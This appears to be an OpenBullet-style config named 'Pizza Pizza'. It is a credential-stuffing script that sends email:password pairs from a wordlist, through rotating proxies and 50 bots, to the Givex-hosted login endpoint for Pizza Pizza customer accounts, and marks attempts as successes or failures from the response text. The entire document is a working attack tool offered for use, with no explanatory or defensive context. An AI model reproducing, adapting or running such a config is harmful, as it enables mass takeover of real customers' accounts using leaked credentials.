[SETTINGS]
{
  "Name": "Pizza Pizza",
  "SuggestedBots": 50,
  "LastModified": "2019-05-02T13:38:39.7948374-04:00",
  "AdditionalInfo": "",
  "Author": "Howzi",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST POST "https://cws.givex.com/cws/pizzapizza/consumer/user/login.py" 
  CONTENT "username=<USER>&password=<PASS>&login_button=Login&form_submit=t" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Logout" 
  KEYCHAIN Failure OR 
    KEY "*Invalid" 
